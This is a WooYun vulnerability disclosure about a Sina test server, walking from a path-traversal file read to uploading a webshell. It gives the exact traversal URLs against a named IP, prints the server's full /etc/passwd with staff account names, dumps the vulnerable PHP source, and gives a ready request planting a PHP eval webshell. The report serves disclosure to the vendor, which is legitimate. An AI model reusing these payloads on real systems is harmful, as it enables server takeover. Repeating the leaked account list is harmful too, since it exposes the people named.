当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091301

漏洞标题:Sina某站从任意文件读取到GetShell

相关厂商:新浪

漏洞作者: boooooom

提交时间:2015-01-12 09:34

修复时间:2015-02-26 09:36

公开时间:2015-02-26 09:36

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-12: 细节已通知厂商并且等待厂商处理中
2015-01-12: 厂商已经确认,细节仅向厂商公开
2015-01-22: 细节向核心白帽子及相关领域专家公开
2015-02-01: 细节向普通白帽子公开
2015-02-11: 细节向实习白帽子公开
2015-02-26: 细节向公众公开

简要描述:

RT

详细说明:

首先从一个看似很蛋疼的页面开始说起
http://123.125.106.97/test/data.php 这是个啥?

1.jpg


嗯,他教我要传入两个参数。

please input 'date=&type='


随便传入两个值发现是下载xls,经验告诉我,date这个参数很有可能是拼接然后读文件,于是有了

http://123.125.106.97/test/data.php?date=../../../../../../../../../../../../../../../../etc/passwd%00&type=../../../../../../../../../../../../../../../../etc/passwd%00


果然是读文件

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sysmon:x:60422:60422::/nonexistent:/nologin
sshd:x:500:500::/home/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
libin1:x:502:502::/usr/home/libin1:/bin/bash
junhai:x:503:503::/usr/home/junhai:/bin/bash
qingming:x:504:504::/usr/home/qingming:/bin/bash
liyuan:x:505:505::/usr/home/liyuan:/bin/bash
hangang:x:507:507::/usr/home/hangang:/bin/bash
wangshuo:x:508:508::/usr/home/wangshuo:/bin/bash
genlei:x:509:509::/usr/home/genlei:/bin/bash
xiaoyue1:x:514:514::/usr/home/xiaoyue1:/bin/bash
pengjie:x:520:520::/usr/home/pengjie:/bin/bash
taohui:x:528:528::/usr/home/taohui:/bin/bash
yuli3:x:533:533::/usr/home/yuli3:/bin/bash
search:x:536:536::/usr/home/search:/sbin/nologin
xueyun:x:537:537::/usr/home/xueyun:/bin/bash
jianqing:x:540:540::/usr/home/jianqing:/bin/bash
hongwei6:x:542:542::/usr/home/hongwei6:/bin/bash
wuhua1:x:543:543::/usr/home/wuhua1:/bin/bash
mysql:x:545:545::/usr/home/mysql:/sbin/nologin
xiaolong:x:547:547::/usr/home/xiaolong:/bin/bash
qixing:x:548:548::/usr/home/qixing:/bin/bash
liuxin4:x:549:549::/usr/home/liuxin4:/bin/bash
zhuhuan:x:550:550::/usr/home/zhuhuan:/bin/bash
zhongqin:x:551:551::/usr/home/zhongqin:/bin/bash
leilei3:x:552:552::/usr/home/leilei3:/bin/bash
yajun:x:554:554::/usr/home/yajun:/bin/bash
dalong1:x:556:556::/usr/home/dalong1:/bin/bash
kaijun1:x:557:557::/usr/home/kaijun1:/bin/bash
zhenqiang1:x:561:561::/usr/home/zhenqiang1:/bin/bash
jinqiang:x:565:565::/usr/home/jinqiang:/bin/bash
rdsup_api:x:567:567::/usr/home/rdsup_api:/bin/bash
chenyang:x:568:568::/usr/home/chenyang:/bin/bash
shukui1:x:569:569::/usr/home/shukui1:/bin/bash
bangjian:x:572:572::/usr/home/bangjian:/bin/bash
kaiwei3:x:574:574::/usr/home/kaiwei3:/bin/bash
maqian:x:576:576::/usr/home/maqian:/bin/bash
guochao3:x:578:578::/usr/home/guochao3:/bin/bash
xiaofeng6:x:580:580::/usr/home/xiaofeng6:/bin/bash
xiaodong2:x:581:581::/usr/home/xiaodong2:/bin/bash
wb_liukai:x:582:582::/usr/home/wb_liukai:/bin/bash
wb_guorui:x:583:583::/usr/home/wb_guorui:/bin/bash
wb_zhuoyue:x:584:584::/usr/home/wb_zhuoyue:/bin/bash
hean:x:585:585::/usr/home/hean:/bin/bash
zhuxing:x:588:588::/usr/home/zhuxing:/bin/bash
xingdong:x:589:589::/usr/home/xingdong:/bin/bash
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
hongkai1:x:590:590::/usr/home/hongkai1:/bin/bash
baohua:x:591:591::/usr/home/baohua:/bin/bash
tangkai:x:592:592::/usr/home/tangkai:/bin/bash


然后,然后猜路径读php源代码啊,嗯,猜到了

http://123.125.106.97/test/data.php?date=../../../../test/data.php%00&type=1
关键是这个文件
../../../../test/tmpls.php


159-163行

...			}else if($mod == 'tmpsave'){
$data = $_REQUEST['data'];
saveTmpl($filename, $data, $url);
return;
}else if($mod == 'down'){
...


saveTmpl可疑的函数,8成屎写文件的,继续下代码看,头部include了一个文件require_once('include/tmpl_func.php');

<?php
require_once("Settings.php");
if(!extension_loaded("curl"))@dl("curl.so");
function crawl($url){
$request = curl_init();
if (!$request) {
return -1;
}
if (!curl_setopt($request, CURLOPT_URL, $url)) {
return -2;
}
if (!curl_setopt($request, CURLOPT_RETURNTRANSFER, true)){
return -3;
}
if (!curl_setopt($request, CURLOPT_TIMEOUT, 15)){
return -4;
}
if (!curl_setopt($request, CURLOPT_ENCODING, 'gzip,deflate')){
return -5;
}
if (!curl_setopt($request, CURLOPT_USERAGENT, 'SinaWeiboBot')) {
return -6;
}
$response = curl_exec($request);
if (!$response) {
return -7;
}
return $response;
}
/*
*页面编码纠正
*/
function judgeCharset($html){
$head = $html->find('head');
$head = current($head);
$meta = $head->find('meta');
for($i=0; $i<count($meta);$i++){
$one = $meta[$i];
//content="text/html; charset=utf-8"
$charset = strtolower($one->getAttribute('content'));
list($type, $code) = explode(";", $charset);
echo $charset;
if(strpos($code, "utf-8") >0 || strpos($code, "utf8") >0){
$one->setAttribute('content', "text/html; charset=gbk");
return true;
}
}
return false;
}
function getUrlContent(&$url){
$content = crawl($url);
if(strpos($content, '</head>') === false){
$content = str_replace('<body>', '</head><body>', $content);
}
if(is_utf8($content)) return "utf8";
else return "gbk";
/*
if(IsUTF8($content)){
$content = iconv('utf-8', 'gbk//ignore', $content);
$arr = array("charset=utf-8" => "charset=gbk");
$content = strtr($content,$arr);
}
*/
return $content;
}
/**
* 取得网页内容
*
* @param string $url
* @return string
*/
function getUrlContent2(&$url){
$http = array('http'=>array('method'=>'GET', 'timeout'=>1, 'user_agent'=>"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 QQDownload/1.7", 'header'=>"Accept-Language: zh-cn,zh;q=0.5"));
$content = @file_get_contents($url, false, stream_context_create($http));
if(strpos($http_response_header[0], '404') !== false)return false;
if(!$content){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 QQDownload/1.7", "Accept-Language: zh-cn,zh;q=0.5"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$content = curl_exec($ch);
curl_close($ch);
}
if(IsUTF8($content))
$content = iconv('utf-8', 'gbk//ignore', $content);
if(strpos($content, '</head>') === false)
$content = str_replace('<body>', '</head><body>', $content);
return $content;
}
/**
*读取配置
*
*@param String $line
*@return array() if is section ,return array(section), if is entry, return array(entry, value)
*/
function readConfig($line){
$line = trim($line);
//解析section
if(strpos($line, '[') == 0 && strrpos($line, ']') == (strlen($line) - 1)){
return array(substr($line, 1, strlen($line) - 2));
}else{
//解析value
$pos = strpos($line, '=');
if($pos > 0){
$entry = trim(substr($line, 0, $pos));
$value = trim(substr($line, $pos+1));
return array($entry, $value);
}
}
return array();
}
/**
* 读取模板配置文件
*
* @param String $filename
* @return Array
*/
function parseTmpl($filename){
if(!file_exists($filename))return false;
$tmpl = new Settings_INI();
$ret = $tmpl->load($filename);
/*
$typeRet = array();
foreach($ret as $section=>$entrys){
//如果是以special开头的,则提取后面的名字
$key = substr($section, strlen("special-"));
foreach($entrys as $entry => $value){
if(strcmp($entry, "GENERAL") == 0){
$typeRet[$key]['score'] = $value;
}else if(strcmp($entry, "WEIGHT") == 0){
$typeRet[$key]['weight'] = $value;
}
else if(strcmp($entry, "TEMPLATE") == 0){
$typeRet[$key]['tmpl'] = $value;
}
}
}
*/
return $ret;
}
function parseTmpl2($filename){
if(!file_exists($filename))return false;
$content = file_get_contents($filename);
$content = iconv('gbk', 'utf-8//ignore', $content);
$lines = preg_split('/\r\n|\n|\r/', $content, -1, PREG_SPLIT_NO_EMPTY);
$data = array();
$count = count($lines);
for($i = 0; $i < $count; $i ++){
$line = $lines[$i];
if(strpos($line, ':') === false)continue;
list($key, $val) = explode(':', $line);
if(strpos($key, '#list') === 0){ //解析list
$t = explode('|', $key);
$name = $t[1];
$path = $val;
$data['list'][$path]['name'] = $name;
$line = $lines[++$i];
while($i < $count && $line != '#endlist'){
list($k, $v) = explode(':', $line);
$data['list'][$path]['content'][$k] = $v;
$line = $lines[++$i];
}
if($i == $count)return false; //没找到结束标签
}else $data[$key] = $val;
}
return $data;
}

/**
* 保存模板到配置文件中
*
*/
function saveTmpl($filename, $data, $url, $flag = true){
if($flag){
$array = json_decode($data, true);
}else $array = $data;
if(!$array)return false;
//初始化common信息
if(!$array['common']){
$array['common']['REGISTER_URL'] = $url;
$array['common']['REGISTER_ID'] = md5($url);
$array['common']['REGISTER_TOP'] = 5;
}else{
if(!$array['common']['REGISTER_URL']) $array['common']['REGISTER_URL'] = $url;
if(!$array['common']['REGISTER_ID']) $array['common']['REGISTER_ID'] = md5($url);
if(!$array['common']['REGISTER_TOP']) $array['common']['REGISTER_TOP'] = 5;
}

$fpFile =fopen($filename, "w");
if(!$fpFile) {
echo "write $filename error.<br/>";
return false;
}
foreach($array as $section=>$entrys){
fprintf($fpFile,"[%s]\n", $section);
foreach($entrys as $entry=>$value){
fprintf($fpFile,"%s = %s\n", $entry, $value);
}
}
fclose($fpFile);
return true;
}
/**检测站点模板是否存在
**/
function existed_tmpl($CONFIG, $site){
$path = $CONFIG['tmpl']['TEMPLATE_PATH'];
if(!file_exists($path)) return false;
//看是否有该站点的模板
//模板命名为$domain.$urlmd5.tmpl
if(!preg_match('/http:\/\/([^\/]+)/', $site, $matches)) {
return false;
}
$domain = $matches[1];
$urlmd5 = md5($site);
$filename = "$path/$domain.$urlmd5.tmpl";
if(!file_exists($filename)) return false;
return true;
}
function saveTmpl2($filename, $data){
$array = json_decode($data, true);
if(!$array)return false;
$str = "";
foreach ($array as $key=>$val){
if($key == 'list')continue;
$str .= "$key:$val\r\n";
}
if(isset($array['list'])){
foreach ($array['list'] as $key=>$val){
$s = '';
$name = $val['name'];
$val = $val['content'];
foreach ($val as $k=>$v){
$s .= "$k:$v\r\n";
}
if(!empty($s))
$str .= "\r\n#list|$name:$key\r\n$s#endlist\r\n";
}
}
$str = iconv('utf-8', 'gbk//ignore', $str);
file_put_contents($filename, $str);
return true;
}
/**
*从生成的html节点下读取页面编码格式
*/
function getContentCode($html){
}
/**
* 处理节点,给每一个有文字的节点添加onmouseover,onmouseout,onclick属性
*
* @param DOMNode $node
*/
function dealNode22($node){
$length = count($node->nodes);
//对每个节点移除所有的事件
$node->removeAttribute("onmouseover");
$node->removeAttribute("onmouseout");
$node->removeAttribute("onclick");
if($length == 0){
$flag = false;
if(trim($node->text()))
$flag = true;
else if($node->tag == 'img')
$flag = true;
if($flag){
if($node->tag == 'text')
$node = $node->parent();
$excludeTags = array('text', 'script', 'style', 'head', 'body', 'iframe', 'input', 'select', 'textarea');
if(!in_array($node->tag, $excludeTags)){
$node->setAttribute('onmouseover', "mouseover(event)");
$node->setAttribute('onmouseout', "mouseout(event)");
$node->setAttribute('onclick', 'return mouseclick(event)');
}
if($node->tag == 'a'){
$node->setAttribute("href", "javascript:void(0)");
$node->setAttribute("target", "_self");
}
}
}else{
foreach ($node->nodes as $n)
dealNode22($n);
}
}
function dealNode($node){
$length = count($node->nodes);
$flag = false;
if(trim($node->text())) $flag = true;
if($flag && $length ==0 ){
$excludeTags = array('text', 'script', 'style', 'head', 'body', 'iframe',
'input', 'select','textarea');
if($node->tag == 'text' || $node->tag == 'img') $node = $node->parent();
if(!in_array($node->tag, $excludeTags)){
if($node->getAttribute('onmouseover') || $node->getAttribute('onclick')) return;
$node->setAttribute('onmouseover', "mouseover(event)");
$node->setAttribute('onmouseout', "mouseout(event)");
$node->setAttribute('onclick', 'return mouseclick(event)');
}
if($node->tag == 'a'){
$node->setAttribute("href", "javascript:void(0)");
$node->setAttribute("target", "_self");
}
}
if($length != 0){
foreach ($node->nodes as $n)
dealNode($n);
}
}
?>


嗯,那么构造一个url传shell

http://123.125.106.97/test/tmpls.php?url=http://www.sina.php%00;123&mod=tmpsave&data={"<?php @eval($_POST[wy123]);?>":123}&common=1


上传成功:
http://123.125.106.97/test/tmpls/www.sina.php

漏洞证明:

caidao.jpg


shell.jpg


2.jpg

修复方案:

罚钱,这个要

版权声明:转载请注明来源 boooooom@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-01-12 11:03

厂商回复:

感谢关注新浪安全,漏洞修复中。

最新状态:

暂无